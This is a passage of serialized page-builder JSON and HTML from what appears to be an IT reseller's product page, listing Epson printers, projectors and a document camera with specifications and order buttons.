refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"39\",\"right\":\"39\",\"bottom\":\"39\",\"left\":\"39\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" 